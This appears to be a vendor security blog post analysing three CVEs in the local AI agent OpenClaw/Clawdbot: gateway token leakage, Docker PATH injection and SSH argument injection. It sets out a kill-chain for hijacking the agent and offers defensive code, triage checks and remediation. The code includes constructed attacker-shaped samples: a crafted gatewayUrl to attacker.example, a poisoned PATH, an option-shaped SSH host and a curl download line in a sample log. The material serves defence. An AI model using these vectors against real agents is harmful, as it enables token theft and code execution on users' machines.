When an AI agent runs locally on your machine, “Remote Code Execution” (RCE) undergoes a dangerous paradigm shift. It is no longer an abstract risk involving a web server in a DMZ; it is a direct, authenticated shell on a developer’s workstation.
Recent disclosures regarding Clawdbot (interchangeably referred to as OpenClaw or Moltbot) have highlighted a critical intersection between the convenience of “Agentic AI” and the rigid reality of infrastructure security. While the mainstream tech press focuses on the novelty of “AI hacking,” for security engineers this incident is a masterclass in classic logic flaws re-emerging in new architectures: unsafe WebSocket handshakes, unescaped paths in container sandboxes, and argument injection vectors.
This is not a hype piece. This is a deep technical breakdown of the three CVEs you need to prioritize, exactly how they chain together to form a kill-chain, and how to verify your remediation with forensic certainty.
1. What “Clawdbot” Refers to in 2026 (The Naming Risk)
Before analyzing the exploits, we must clarify the terminology. Inconsistent naming is a primary cause of failed vulnerability scans.
- The Project: The open-source project is widely known today as OpenClaw. However, due to a recent rebrand and fork history, legacy documentation, package managers (like Homebrew or pip), and even NVD records frequently reference Clawdbot or Moltbot.
- The Architecture: Regardless of the name, the risk surface is identical. This is a local-first personal AI assistant. Unlike a passive LLM (like ChatGPT in a browser), OpenClaw/Clawdbot is designed to integrate deep into your OS. It has permissions to read files, write code, execute shell commands, and manage Docker containers.
- The “RCE” Context: In this specific scenario, RCE does not necessarily mean “buffer overflow.” It means an attacker gaining the ability to drive the agent’s pre-authorized tools (Shell, Docker, SSH) or to inject commands into the agent’s control plane. If the agent is authorized to run `rm -rf` and you trick the agent, you have achieved RCE.

2. The CVEs You Must Put in the Incident Ticket
The following three vulnerabilities form the core of the recent advisory cluster. You must ensure your remediation plan addresses the specific version cutoff: 2026.1.29.
2.1 CVE-2026-25253 — Gateway Url + Auto WebSocket Connect + Token Leakage
Severity: Critical (CVSS 9.1)
Component: Control Plane / WebSocket Handshake
Fixed Version: 2026.1.29
According to NVD data, this vulnerability exists because the application accepts a gatewayUrl via a query string parameter and automatically initiates a WebSocket connection to that URL without user confirmation.
The Technical Flaw:
The agent’s local web server listens for configuration parameters via URL. If a user visits a link like http://localhost:port/?gatewayUrl=wss://attacker.com, the agent immediately initiates a connection to attacker.com.
Crucially, during this WebSocket handshake, the agent transmits its authentication token to authorize the session.
Security Engineer Interpretation:
While The Hacker News frames this as “token exfiltration,” in an agentic architecture a stolen token is effectively RCE. This token represents the user’s authority. Once an attacker possesses it, they can connect to the agent’s legitimate gateway and issue commands as if they were the user sitting at the keyboard. This bypasses all “human-in-the-loop” controls that rely on session validity.
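To make the flaw concrete, here is an added example (not OpenClaw’s code, and not taken from the advisory) contrasting the vulnerable handling of a `gatewayUrl` query parameter with a hardened version that refuses anything outside an allowlist and never switches upstream without explicit confirmation. The allowlist contents, the placeholder token and the function names are assumptions.

```python
from urllib.parse import parse_qs, urlparse

# Constructed allowlist of gateways the agent may ever talk to (assumption).
ALLOWED_GATEWAYS = {"wss://api.mycorp.com"}
# Placeholder standing in for the agent's session token; never a real credential.
AUTH_TOKEN = "example-token-not-real"


def vulnerable_pick_gateway(page_url):
    """The flawed behaviour: whatever gatewayUrl the query string carries
    becomes the upstream, and the token rides along in the handshake."""
    params = parse_qs(urlparse(page_url).query)
    target = params.get("gatewayUrl", [None])[0]
    if target:
        return {"connect_to": target, "token": AUTH_TOKEN}  # token leaves with the connection
    return None


def normalize_origin(url):
    """Reduce a gateway URL to scheme://host:port so comparisons are not
    fooled by letter case or an omitted default port. Only wss:// is accepted."""
    parsed = urlparse(url)
    if parsed.scheme != "wss" or not parsed.hostname:
        return None
    return f"wss://{parsed.hostname.lower()}:{parsed.port or 443}"


def hardened_pick_gateway(page_url, user_confirmed=False):
    """Hardened behaviour: the parameter may only name an allowlisted wss://
    origin, the switch still needs the user's confirmation, and the token is
    released only once both conditions hold."""
    params = parse_qs(urlparse(page_url).query)
    target = params.get("gatewayUrl", [None])[0]
    if not target:
        return {"decision": "ignore"}
    origin = normalize_origin(target)
    allowed = {normalize_origin(u) for u in ALLOWED_GATEWAYS}
    if origin is None or origin not in allowed:
        return {"decision": "reject", "reason": "gateway not in allowed_gateways"}
    if not user_confirmed:
        return {"decision": "prompt", "target": target}
    return {"decision": "connect", "target": target, "token": AUTH_TOKEN}


if __name__ == "__main__":
    crafted = "http://127.0.0.1:5500/?gatewayUrl=wss://attacker.example"  # constructed
    print("vulnerable:", vulnerable_pick_gateway(crafted))
    print("hardened:  ", hardened_pick_gateway(crafted))
    print("hardened, allowlisted, no confirmation:",
          hardened_pick_gateway("http://127.0.0.1:5500/?gatewayUrl=wss://api.mycorp.com"))
```

The important property is that the hardened path has no branch in which an unconfirmed or non-allowlisted URL ever sees the token; an allowlist check alone still leaves the user one click from a silent upstream change, which is why the confirmation gate stays in.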
2.2 CVE-2026-24763 — Docker Sandbox Command Injection via PATH Handling
Severity: High
Component: Docker Execution Provider
Fixed Version: 2026.1.29
This vulnerability demonstrates why “sandboxing” is difficult. The flaw lies in unsafe handling of the system PATH environment variable within the Docker execution mechanism.
The Technical Flaw:
When the agent constructs the command to run inside a Docker container, it allows the user (or the attacker controlling the agent) to specify environment variables. NVD reports that the input validation for the PATH variable was insufficient.
An authenticated attacker can set PATH to point to a directory they control (or a temporary location where they have written a payload). When the agent attempts to run a “safe” tool (like python or grep), the OS looks in the malicious PATH first and executes the attacker’s binary instead.
Impact:
This allows an attacker to “break out” of the intended logic. Even if the agent is only supposed to run Python scripts, this vulnerability allows the execution of arbitrary binaries present in the container or mounted volumes. This maps to CWE-78 (OS Command Injection).
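The following added example (not OpenClaw’s code) shows the two shapes of the sandbox launcher side by side: a builder that forwards caller-supplied environment variables untouched and names the tool by bare name, and a hardened builder that pins PATH, refuses loader-affecting variables, and resolves every allowlisted tool to an absolute path inside the image. The image name, tool paths and policy names are assumptions.

```python
# Tools the sandbox may run, resolved to absolute paths inside the image
# (assumed layout), so PATH lookup never decides what actually executes.
ALLOWED_TOOLS = {
    "python": "/usr/local/bin/python3",
    "grep": "/usr/bin/grep",
}
# Variables the caller must never control: each one changes which code runs.
PROTECTED_ENV = {"PATH", "LD_PRELOAD", "LD_LIBRARY_PATH", "PYTHONPATH"}
SAFE_PATH = "/usr/local/bin:/usr/bin:/bin"
IMAGE = "sandbox-image"  # assumed image name


class SandboxPolicyError(ValueError):
    """Raised when a request violates the sandbox policy."""


def vulnerable_docker_argv(tool, args, user_env):
    """The flawed shape: every caller-supplied variable, PATH included, is
    forwarded, and the tool is passed by name, so whichever directory PATH
    lists first decides what 'python' means inside the container."""
    argv = ["docker", "run", "--rm"]
    for name, value in user_env.items():
        argv += ["-e", f"{name}={value}"]
    return argv + [IMAGE, tool, *args]


def hardened_docker_argv(tool, args, user_env):
    """Hardened shape: allowlisted tool by absolute path, PATH set by the
    agent, protected variables refused, remaining variables syntax-checked.
    argv stays a list, so no shell ever parses the values."""
    if tool not in ALLOWED_TOOLS:
        raise SandboxPolicyError(f"tool not allowlisted: {tool!r}")
    blocked = PROTECTED_ENV & set(user_env)
    if blocked:
        raise SandboxPolicyError(f"protected variables rejected: {sorted(blocked)}")
    for name, value in user_env.items():
        if not name.isidentifier() or not isinstance(value, str) or any(c in value for c in "\n\0"):
            raise SandboxPolicyError(f"malformed variable: {name!r}")
    argv = ["docker", "run", "--rm", "-e", f"PATH={SAFE_PATH}"]
    for name, value in user_env.items():
        argv += ["-e", f"{name}={value}"]
    return argv + [IMAGE, ALLOWED_TOOLS[tool], *args]


def policy_rejects(tool, args, user_env):
    """True when the hardened builder refuses the request."""
    try:
        hardened_docker_argv(tool, args, user_env)
    except SandboxPolicyError:
        return True
    return False


if __name__ == "__main__":
    poisoned = {"PATH": "/tmp/evil:/usr/bin"}  # constructed attacker-shaped input
    print("vulnerable:", " ".join(vulnerable_docker_argv("python", ["analyze.py"], poisoned)))
    print("hardened rejects poisoned PATH:", policy_rejects("python", ["analyze.py"], poisoned))
    print("hardened:", " ".join(hardened_docker_argv("python", ["analyze.py"], {"PROJECT": "demo"})))
```

Resolving tools to absolute paths is the part that survives future variants: even if a new variable slips past the denylist, the executed binary is chosen by the agent, not by the container’s lookup order.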
2.3 CVE-2026-25157 — Remote/SSH Mode Command Injection
Severity: Medium/High (Context Dependent)
Component: Remote/SSH Mode (specifically the macOS menubar app)
Fixed Version: 2026.1.29
This vulnerability is scoped to the “Remote” functionality, where the agent connects to remote servers via SSH to perform tasks.
The Technical Flaw:
- Unescaped Project Path: An error path in a shell script failed to properly escape the project path string. If an attacker can influence the project path name, they can inject shell commands that execute when the error handler triggers.
- Argument Injection: The SSH invocation did not use the `--` delimiter to separate options from positional arguments. If an attacker supplies a hostname that looks like `-oProxyCommand=...`, SSH interprets it as a configuration flag rather than a target.
Impact:
This allows execution of commands on the remote host the agent is connecting to, or on the local host initiating the connection, depending on the specific vector used.
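Both flaws in this section come down to how the SSH command line is assembled. The added example below (not OpenClaw’s code) shows the flawed shape beside a builder that validates the hostname, puts `--` before the destination, and quotes the project path with `shlex.quote` so the remote shell sees it as one literal word. The remote user name, the `BatchMode` option and the `cd && ls` task are assumptions.

```python
import re
import shlex

REMOTE_USER = "agent"  # assumed remote account
# Assumed host policy: DNS labels and IPv4 literals only; no leading '-'.
HOST_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9.\-]*")


class RemoteArgError(ValueError):
    """Raised when a host or path could be read as something other than data."""


def vulnerable_ssh_command(host, project_path):
    """The flawed shape, as the shell string a script would build: the host
    precedes any '--', so a value starting with '-' parses as an ssh option,
    and the project path is interpolated unquoted into the remote command."""
    return f"ssh {host} cd {project_path} && ls"


def is_safe_host(host):
    """A host is usable only if it cannot be mistaken for an option and
    contains nothing ssh or a shell would treat specially."""
    return bool(host) and not host.startswith("-") and HOST_RE.fullmatch(host) is not None


def hardened_ssh_argv(host, project_path):
    """Argument list for the same task with both injection points closed."""
    if not is_safe_host(host):
        raise RemoteArgError(f"unsafe hostname: {host!r}")
    if any(c in project_path for c in "\n\0"):
        raise RemoteArgError("project path contains control characters")
    # shlex.quote turns the path into a single literal word for the remote
    # shell, whatever metacharacters it contains.
    remote_cmd = f"cd {shlex.quote(project_path)} && ls"
    # '--' ends option parsing: the destination after it is always positional.
    return ["ssh", "-o", "BatchMode=yes", "--", f"{REMOTE_USER}@{host}", remote_cmd]


def host_rejected(host):
    """True when the hardened builder refuses the host."""
    try:
        hardened_ssh_argv(host, "/srv/app")
    except RemoteArgError:
        return True
    return False


if __name__ == "__main__":
    # Constructed inputs: a project name carrying shell metacharacters.
    print("vulnerable:", vulnerable_ssh_command("build-host.internal", "my proj; id"))
    print("hardened:  ", hardened_ssh_argv("build-host.internal", "my proj; id"))
    print("option-shaped host rejected:", host_rejected("-oProxyCommand=anything"))
```

Note that quoting the path protects the remote side only; the hostname check is what protects the local side, because anything ssh reads as an option is acted on before a connection is even attempted.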
Summary Table
| Item | What it is | Preconditions | Impact (Defender View) | Fixed Version |
|---|---|---|---|---|
| CVE-2026-25253 | gatewayUrl triggers auto WS connect + token send | User interacts with crafted link; Vulnerable build running | Entry Point: Token theft → gateway compromise; leads to control of agent logic. | 2026.1.29 (The Hacker News) |
| CVE-2026-24763 | Command injection in Docker sandbox via PATH | Authenticated user (or stolen token) can control env vars | Escalation: Command execution inside container context; escape possible via mounts. | 2026.1.29 (NVD) |
| CVE-2026-25157 | OS command injection in Remote/SSH mode | Attacker influences SSH settings/target or project path | Lateral Movement: Code exec on local or remote host; scoped to macOS app. | 2026.1.29 (GitHub) |

3. The “RCE Kill-Chain” Engineers Actually See
To understand the risk, we must look past individual CVEs and view the “Kill-Chain.” This is how a remote attacker turns a link click into a shell on your laptop.
Phase 1: Infiltration (The Setup)
The attacker hosts a malicious WebSocket server. They craft a URL targeting the local agent (e.g., http://127.0.0.1:5500/?gatewayUrl=...). They send this link to a developer via email, Slack, or a “Helpful Code Snippet” forum post.
- Mechanism: CVE-2026-25253 (Parameter Injection).
Phase 2: Compromise (The Handshake)
The victim clicks the link. The local OpenClaw agent sees the gatewayUrl param and obediently switches its upstream connection to the attacker’s server. During the handshake, it sends the Auth-Token.
- Mechanism: Token Exfiltration.
- Outcome: The attacker now has a persistent session ID valid for the agent’s control plane.
Phase 3: Weaponization (The Instructions)
The attacker connects to the victim’s agent using the legitimate API and the stolen token. They are now “The User.” They instruct the agent to “Analyze this project,” passing a configuration that defines a malicious PATH environment variable.
- Mechanism: Abuse of legitimate agent features + CVE-2026-24763 (Docker Injection).
Phase 4: Execution (The Shell)
The agent spins up the Docker sandbox to perform the task. Because of the poisoned PATH, when the agent tries to run a standard analysis tool, it executes the attacker’s script instead.
- Outcome: Arbitrary code execution within the container. If the container has the host filesystem mounted (common in dev agents), the attacker writes a persistence backdoor to `~/.zshrc`.
4. Triage Checklist: Determine Exposure in 15 Minutes
Do not rely on generic vulnerability scanners that may not yet have signatures for “Moltbot.” Use this manual triage process.
4.1 Identify Version and Build Provenance
You need to check the binary version. Remember the cutoff: anything prior to 2026.1.29 is vulnerable.
```bash
# safe to run in terminal
# Check for OpenClaw, Clawdbot, or Moltbot binaries
if command -v openclaw &> /dev/null; then
  openclaw --version
elif command -v clawdbot &> /dev/null; then
  clawdbot --version
elif command -v moltbot &> /dev/null; then
  moltbot --version
else
  echo "Binary not found in PATH. Check UI or /Applications."
fi
```
Why: NVD explicitly flags versions before the Jan 29, 2026 release as critical.
4.2 Find Exposed Control Surfaces
Is the agent listening only on localhost, or is it exposed to the LAN?
- Run: `lsof -i -P | grep -E "openclaw|clawdbot"`
- Look for: `*:*` or `0.0.0.0:*` listens.
- Risk: If exposed to the LAN, an attacker does not need you to click a link; they can trigger CVE-2026-25253 directly if they are on the same Wi-Fi. (Tenable® warns significantly about misconfigured listening interfaces.)
4.3 Review Execution Primitives
Check the agent’s `config.toml` or `settings.json`.
- Auto-Approve: Look for `auto_approve = true` or lists containing `["shell", "bash", "cmd"]`. This setting removes the “Human-in-the-loop” barrier, turning the agent into an automated RCE bot.
- Docker Socket: Verify whether the Docker socket `/var/run/docker.sock` is mounted into the agent’s sandbox. This facilitates container escapes.
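The checks above are easy to script so they can be repeated on every workstation and attached to the evidence bundle. The following added example (not a Penligent or OpenClaw tool) loads `config.toml` or `settings.json` and reports the auto-approve, Docker socket, broad-mount and gateway-allowlist findings. The key layout (`auto_approve`, `docker.mounts`, `allowed_gateways`) is an assumption standing in for the agent’s real schema; adjust the lookups to match your build.

```python
import json
import re

try:
    import tomllib  # standard library on Python 3.11+; needed for config.toml
except ImportError:  # older interpreters: JSON configs still work
    tomllib = None

SHELL_TOOLS = {"shell", "bash", "cmd"}
DOCKER_SOCKET = "/var/run/docker.sock"
# Mount sources that hand the sandbox a whole home directory or the root fs.
BROAD_MOUNT_RE = re.compile(r"(/|~|\$HOME|/home/[^/]+|/Users/[^/]+)/?")


def load_config(path):
    """Read config.toml or settings.json into a dict."""
    with open(path, "rb") as fh:
        raw = fh.read()
    if path.endswith(".toml"):
        if tomllib is None:
            raise RuntimeError("parsing TOML needs Python 3.11+")
        return tomllib.loads(raw.decode("utf-8"))
    return json.loads(raw)


def mount_source(mount):
    """Accept both 'src:dst' strings and {'source': ..., 'target': ...} tables."""
    if isinstance(mount, str):
        return mount.split(":", 1)[0]
    return str(mount.get("source", ""))


def audit_config(cfg):
    """Return (severity, code, message) findings for the checks in this section."""
    findings = []
    auto = cfg.get("auto_approve")
    if auto is True:
        findings.append(("high", "auto_approve_all",
                         "auto_approve = true removes the human-in-the-loop barrier for every tool"))
    elif isinstance(auto, list):
        granted = SHELL_TOOLS & {str(t).lower() for t in auto}
        if granted:
            findings.append(("high", "auto_approve_shell",
                             f"auto_approve grants shell tools: {sorted(granted)}"))
    for mount in cfg.get("docker", {}).get("mounts", []):
        src = mount_source(mount)
        if src == DOCKER_SOCKET:
            findings.append(("high", "docker_socket_mount",
                             "Docker socket is mounted into the sandbox (container escape path)"))
        elif BROAD_MOUNT_RE.fullmatch(src):
            findings.append(("medium", "broad_mount",
                             f"sandbox mounts an entire home or root directory: {src}"))
    gateways = cfg.get("allowed_gateways") or []
    if not gateways:
        findings.append(("medium", "no_gateway_allowlist",
                         "allowed_gateways is empty; redirection bugs are mitigated by the patch alone"))
    for url in gateways:
        if not str(url).startswith("wss://"):
            findings.append(("medium", "plaintext_gateway", f"gateway is not wss://: {url}"))
    return findings


# Constructed sample configurations (not from any real installation).
RISKY_CONFIG = {
    "auto_approve": ["shell", "read_file"],
    "docker": {"mounts": ["/var/run/docker.sock:/var/run/docker.sock", "/home/dev:/workspace"]},
    "allowed_gateways": ["ws://api.mycorp.com"],
}
CLEAN_CONFIG = {
    "auto_approve": False,
    "docker": {"mounts": ["/home/dev/projects/app:/workspace"]},
    "allowed_gateways": ["wss://api.mycorp.com"],
}

if __name__ == "__main__":
    for label, cfg in (("risky", RISKY_CONFIG), ("clean", CLEAN_CONFIG)):
        print(f"{label}: {len(audit_config(cfg))} finding(s)")
        for severity, code, message in audit_config(cfg):
            print(f"  [{severity}] {code}: {message}")
```

Run it as `audit_config(load_config("/path/to/config.toml"))` against a live install; an empty list is the “config.toml showing auto_approve disabled” evidence the verification section asks for, in machine-checkable form.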
5. Remediation Playbook: Patch First, Then Harden
5.1 Non-Negotiable: Upgrade to a Fixed Build
There is no configuration workaround for the WebSocket token leak. You must upgrade the binary.
- Action: Update to v2026.1.29 or later immediately. This version removes the auto-connect logic for `gatewayUrl` and sanitizes the `PATH` handling.
5.2 Hardening Patterns that Survive Future CVEs
Patching fixes the bug; hardening fixes the architecture.
- Connection Target Allowlisting: Configure the agent to only allow WebSocket connections to your enterprise gateway or known-good URLs.
  - Control: In the new config, look for `allowed_gateways = ["wss://api.mycorp.com"]`. This neutralizes the impact of any future redirection bugs.
- Privilege Minimization:
  - User Context: Never run the agent as `root` or with `sudo` cached credentials. Create a dedicated user `clawdbot-user` with restricted read/write permissions.
  - Network Egress: Use a host-based firewall (Little Snitch, LuLu, or iptables) to block the agent from initiating outbound connections to unknown IPs.
- Execution Gating:
  - Disable Auto-Approve: For any tool that modifies the filesystem or executes code, require explicit UI confirmation.
  - Isolate Docker: Ensure the Docker sandbox does not mount the entire `$HOME` directory. Scope it to specific project folders only.
5.3 Supply-Chain Reality: Skills as an RCE Multiplier
The Verge recently reported on the “Malicious Skills” marketplace. An agent is only as safe as the tools you give it.
- Risk: You patch the agent, but then install a community “PDF Summarizer” skill. This skill contains a malicious `post-install` script.
- Defense: Treat skills like unvetted `npm` packages. Audit the code of any third-party skill before installation. If the skill asks for “Shell Execution” permission, deny it unless strictly necessary.
6. Verification: How to Prove You’re Fixed
For audit logs and post-mortems, you need evidence that the vulnerability is closed.
Post-Upgrade Verification
- Version Output: Screenshot the CLI output showing version 2026.1.29.
- Gateway Test: Attempt to launch the agent with the malicious query string: `openclaw --gatewayUrl "wss://test.com"`.
- Success Criteria: The agent should either ignore the parameter or prompt the user for confirmation (depending on the specific patch implementation), but it must not auto-connect.
Telemetry to Monitor
Add these signals to your EDR/SIEM:
- Token Use Anomalies: A valid user token being used from a new IP address or user-agent (indicating theft).
- Gateway Changes: Logs showing the agent switching its upstream WebSocket target.
- Process Spawning: `openclaw` spawning `sh`, `bash`, or `curl` commands that deviate from known patterns.
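The three signals above can be expressed as one small detector. The added example below (not OpenClaw telemetry and not a Penligent component) runs over constructed JSON log lines: it baselines each token on the first (source IP, user agent) pair it appears with and alerts on any other pair, flags an upstream switch to a gateway outside the allowlist, and flags agent-spawned shells or `curl` whose command line is not in a known baseline. The event schema, field names and allowlist are assumptions; map them onto whatever your EDR or the agent’s own logs emit.

```python
import json

ALLOWED_GATEWAYS = {"wss://api.mycorp.com"}                # assumption
AGENT_BINARIES = {"openclaw", "clawdbot", "moltbot"}
WATCHED_CHILDREN = {"sh", "bash", "curl"}
# Constructed baseline of spawns known to be legitimate: (parent, child, cmdline).
KNOWN_SPAWNS = {("openclaw", "bash", "make test")}

# Constructed log lines, one JSON event per line (not real OpenClaw output).
SAMPLE_LOG = """\
{"ts":"2026-02-01T09:00:00Z","event":"auth","token_id":"tok_a1","src_ip":"10.0.0.12","user_agent":"openclaw-ui/1.0"}
{"ts":"2026-02-01T09:05:00Z","event":"auth","token_id":"tok_a1","src_ip":"10.0.0.12","user_agent":"openclaw-ui/1.0"}
{"ts":"2026-02-01T09:07:00Z","event":"gateway_switch","from":"wss://api.mycorp.com","to":"wss://attacker.example"}
{"ts":"2026-02-01T09:08:00Z","event":"auth","token_id":"tok_a1","src_ip":"203.0.113.9","user_agent":"python-websockets/12"}
{"ts":"2026-02-01T09:09:00Z","event":"proc_spawn","parent":"openclaw","child":"bash","cmdline":"make test"}
{"ts":"2026-02-01T09:10:00Z","event":"proc_spawn","parent":"openclaw","child":"curl","cmdline":"curl -o /tmp/x http://203.0.113.9/x"}
"""


def detect(lines):
    """Return (kind, ts, detail) alerts for the token, gateway and spawn signals."""
    alerts = []
    baseline = {}  # token_id -> (src_ip, user_agent) first seen
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        kind = ev.get("event")
        if kind == "auth":
            seen = (ev["src_ip"], ev["user_agent"])
            first = baseline.setdefault(ev["token_id"], seen)
            if seen != first:
                alerts.append(("token_anomaly", ev["ts"],
                               f"{ev['token_id']} used from {seen}, baseline {first}"))
        elif kind == "gateway_switch":
            if ev["to"] not in ALLOWED_GATEWAYS:
                alerts.append(("gateway_change", ev["ts"],
                               f"upstream moved from {ev['from']} to {ev['to']}"))
        elif kind == "proc_spawn":
            cmdline = ev.get("cmdline", "")
            if (ev["parent"] in AGENT_BINARIES and ev["child"] in WATCHED_CHILDREN
                    and (ev["parent"], ev["child"], cmdline) not in KNOWN_SPAWNS):
                alerts.append(("process_spawn", ev["ts"],
                               f"{ev['parent']} -> {ev['child']}: {cmdline}"))
    return alerts


if __name__ == "__main__":
    for kind, ts, detail in detect(SAMPLE_LOG.splitlines()):
        print(f"{ts} {kind}: {detail}")
```

The first-seen baseline is deliberately naive; in production, seed it from a longer history window so a user’s legitimate second device is not the first thing the rule fires on.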
Evidence Bundle Checklist
- [ ] Screenshot of `openclaw --version`
- [ ] Copy of `config.toml` showing `auto_approve` disabled.
- [ ] Log snippet showing a rejected connection attempt to an untrusted gateway.
At Penligent, we approach agent security through defensive validation. We don’t just scan code; we validate the runtime posture of AI agents.
Our platform performs repeatable checks for exposed control surfaces (like the WebSocket gateway) and validates configuration weaknesses (like auto-approve settings) without shipping exploit code. We help security teams move from “guessing we are safe” to having a Proof-of-Remediation report. If you are deploying agents like Clawdbot in production, review our guide on OpenClaw AI Security Engineering for a defensive architecture reference.
7. Appendix: Quick FAQ + Executive Summary
Q: Is this only an OpenClaw issue or also ‘Clawdbot/Moltbot’?
A: The naming is inconsistent due to forks. The CVEs (CVE-2026-25253, etc.) officially reference OpenClaw, but they apply to the codebase formerly known as Clawdbot and Moltbot. If your binary is older than Jan 30, 2026, it is vulnerable regardless of the name. (Source: NVD).
Q: Do I need to be internet-exposed to be at risk?
A: No. The most critical vector (Token Theft) relies on a “Cross-Site” style attack. If you click a link in your browser, the browser connects to your local agent. You do not need to have ports open to the public internet to be exploited.
Q: What should enterprises ban by policy?
A:
- Untrusted Skills: Ban skills from unverified community repos.
- Auto-Approve: Ban the use of “Auto-Approve” for shell execution in corporate environments.
- Root Access: Ensure agents are not running with elevated privileges.
References
- [NVD] CVE-2026-25253 Description and References.
- [The Hacker News] Patch version and framing of the bug’s impact.
- [NVD] CVE-2026-24763 Command Injection description and fixed version.
- [GitHub Advisory] CVE-2026-25157 Scope + Impacted Components List.
- [Tenable] Summary of Clawdbot/Moltbot/OpenClaw risk categories.
- [The Verge] Malicious skills marketplace findings (Supply-chain angle).
- [Penligent] Clawdbot Shodan Post-Mortem & Defense Architecture.
- [Penligent] OpenClaw AI Vulnerability (RCE + Indirect Injection).
- [Penligent] OpenClaw AI Security Engineering Overview.
- [Penligent] Cloud-Native Security Practices in Production.

